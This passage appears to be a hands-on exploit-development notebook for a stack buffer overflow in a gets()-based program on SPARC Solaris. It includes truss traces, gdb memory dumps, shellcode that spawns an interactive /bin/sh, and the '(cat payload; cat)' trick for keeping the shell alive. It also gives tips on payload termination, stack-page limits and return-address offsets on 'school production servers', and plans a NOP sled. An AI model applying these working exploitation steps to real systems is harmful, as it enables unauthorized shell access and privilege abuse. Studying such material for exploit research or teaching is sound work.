-1, 0) = 0xFF380000 mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF350) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000 mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000 close(3) = 0 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000 munmap(0xFF390000, 8192) = 0 brk(0x000310C8) = 0 brk(0x000330C8) = 0 getuid() = 100 [100] getuid() = 100 [100] execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0) argc = 1 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/usr/lib/libc.so.1", 0xFFBEF7F0) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x127A87A0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000 mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000 mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000 munmap(0xFF32C000, 65536) = 0 memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF7F0) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x127A4538, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 
0xFF380000 mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF508) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000 mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000 close(3) = 0 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000 munmap(0xFF390000, 8192) = 0 sp = 0xwrite(2, " s p = 0 x", 7) = 7 ffbefdb8write(2, " f f b e f d b 8", 8) = 8 write(2, "\n", 1) = 1 ioctl(0, TCGETA, 0xFFBEFB54) Err#25 ENOTTY fstat64(0, 0xFFBEFBC8) = 0 brk(0x00020B00) = 0 brk(0x00024B00) = 0 read(0, "01 A A A01 B B B01 C C C".., 8192) = 421 read(0, 0x00020B0C, 8192) = 0 execve("/bin/sh", 0xFFBEFEB0, 0x00000000) argc = 2 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/usr/lib/libgen.so.1", 0xFFBEF828) = 0 resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20 open("/usr/lib/libgen.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000 mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000 mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000 munmap(0xFF376000, 65536) = 0 memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libc.so.1", 0xFFBEF828) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 
open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000 mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000 mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000 munmap(0xFF32C000, 65536) = 0 memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF828) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000 mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000 mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000 close(3) = 0 munmap(0xFF390000, 8192) = 0 getpid() = 2098 [2097] getpgid(2098) = 2097 getsid(2098) = 1819 brk(0x0003A108) = 0 sysconfig(_CONFIG_SIGRT_MIN) = 38 sysconfig(_CONFIG_SIGRT_MAX) = 45 sigaltstack(0xFFBEFE5C, 0x00000000) = 0 sigaction(SIGHUP, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGINT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8) 
= 0 sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGILL, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGURG, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMIN+3, 
0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8) = 0 getuid() = 100 [100] getuid() = 100 [100] getgid() = 10 [10] getgid() = 10 [10] getuid() = 100 [100] ioctl(0, TCGETS, 0x000391B0) Err#25 ENOTTY $ write(2, " $ ", 2) = 2 read(0, 0x000394D0, 128) = 0 fcntl(0, F_GETFL, 0x00000000) = 8192 fstat64(0, 0xFFBEFC28) = 0 ioctl(0, TCGETA, 0xFFBEFD7C) Err#25 ENOTTY close(0) = 0 llseek(0, 0, SEEK_CUR) Err#9 EBADF _exit(0) -bash-4.3$
I finally start to put 2 and 2 together…
$PWD/invoke2 v < payload
That command line was the problem. Because stdin was redirected from the payload file, the spawned shell inherited that same stdin. By the time `/bin/sh` ran, the vulnerable program had already consumed the whole file, so the shell's very first read on fd 0 returned 0 (EOF) and it simply exited — you can see exactly that in the truss output above: `read(0, 0x000394D0, 128) = 0` followed immediately by `_exit(0)`. The shell did spawn; it just had nothing to read, and it said "I GUESS I'M FINISHED HERE.. EOF".
Here's my temporary fix, inspired by http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe : keep stdin open after the payload has been sent, so the shell has something to read from.
Here’s a temporary solution
The beauty of a raw tty (you may have to hit Enter once at the beginning, and again after typing `exit`, because the input is still going through a cooked, line-buffered `cat`):
Notes
The difference between invoking `/bin/sh -i` and plain `/bin/sh` is that `-i` forces the shell into interactive mode even though its stdin is a pipe rather than a terminal, which is what makes it print the `$` prompt. I could not find a way to get a prompt from plain `/bin/sh` when feeding it through `cat` without `-i`.
Here's an example of the exploit running; this version of the shellcode does an `execve("/bin/sh", ["/bin/sh", "-i"], ...)`:
# anything enclosed in [] is note from me added after execution -bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin -bash-4.3$ (cat payload; cat) | $PWD/invoke2 v sp = 0xffbefdb8 [hangs here until you hit enter key, probably an incident of using cat and cooked input] $ ls alternating_payload2 asmshell2.bin exec payload3 v2 alternating_payload2.c asmshell3.bin howto_a_payload payload_asmshell6 v2.c alternating_payload3 asmshell4.bin invoke2 payload_fix_fp write_raw.bin alternating_payload3.c asmshell5_interactive.bin ksh_shellcode payload_trashed_fp asm asmshell6.bin magic_crash_length readme.txt asm_tcsh.bin build_shellcode_steps payload v asmshell.bin core payload2 v.c $ exit [hangs here until you hit enter key again, probably an incident of using cat and cooked input] -bash-4.3$
Next: figure out how much room there is before the overflow runs off the end of the stack mapping (which is bad — the write faults before control ever reaches the shellcode).
(gdb) q -bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload -bash-4.3$ $PWD/invoke2 -d v GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (gdb) b 16 Breakpoint 1 at 0x10750: file v.c, line 16. (gdb) r < payload Starting program: /home/bazz/latest/v < payload warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" sp = 0xffbefda0 Program received signal SIGSEGV, Segmentation fault. 0xff2c3064 in memccpy () from /usr/lib/libc.so.1 (gdb)
The only logical explanation was that the buffer needed to be shortened. At first I assumed it must be overwriting libc, or some far out-of-bounds area. I could not work out exactly why, so I just cut the buffer down. Then I actually learned what was going on: using `pmap` and trying different buffer sizes, it turns out the stack is mapped as a single 8K region starting at FFBEE000 (`FFBEE000 8K read/write/exec [ stack ]`). Note that the fault is reported inside `memccpy()` simply because that is the libc routine doing the copy on behalf of `gets()`; libc itself lives far below the stack (around 0xFF280000 in the truss output) and is not being overwritten — the copy is walking off the top of the stack mapping.
FFBEE000 + 8k (0x2000) = 0xFFBF0000
so 0xFFBF0000 is the first address beyond the mapped stack page. As soon as the copy reaches that address it faults, which is exactly what gdb shows below ("Cannot access memory at address 0xffbf0000").
(gdb) 0xffbeff80: 0x03424242 0x03434343 0x03444444 0x03454545 0xffbeff90: 0x03464646 0x03474747 0x03484848 0x03494949 0xffbeffa0: 0x034a4a4a 0x034b4b4b 0x034c4c4c 0x034d4d4d 0xffbeffb0: 0x034e4e4e 0x034f4f4f 0x03505050 0x03515151 0xffbeffc0: 0x03525252 0x03535353 0x03545454 0x03555555 0xffbeffd0: 0x03565656 0x03575757 0x03585858 0x03595959 0xffbeffe0: 0x035a5a5a 0x04414141 0x04424242 0x04434343 0xffbefff0: 0x04444444 0x04454545 (gdb) 0xffbefff8: 0x04464646 0x04470000 Cannot access memory at address 0xffbf0000 (gdb)
NOTE!! When exploiting `gets()`, it is IMPERATIVE to terminate the payload with 0x0a (newline) rather than a null byte. `gets()` stops reading only at a newline or EOF — a NUL in the input is copied into the buffer like any other byte and does not stop the read. I didn't do that above and it led to hairy things: I had to hit Enter myself to end the line, and I assume that is why the last two bytes of the buffer above are 00 00 — that was the space taken by the line terminator (I guessed \r\n at the time, though a cooked tty normally delivers just \n). You can avoid all of this by putting 0x0a at the end of your buffer.
In the scenario of exploiting `apply`, the program can be spawned an unlimited number of times, so repeated attempts against different return-address guesses are practical.
To get really sweet, the next step is to open our own tty to "write" the shellcode through, and eventually our own terminal, so we can interact directly with the shell on the other end instead of fighting `cat` and cooked-mode input :)
There is a 0x18-byte (24-byte) difference between the return-address offset under the debugger and the one in a normal run (compare the `e50` and `e68` values below). This is most likely because gdb changes the process environment, which shifts the stack; the difference does not exist on the school production servers.
i.e.
e50 # debug return address – 8
e68 # production return address – 8
To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops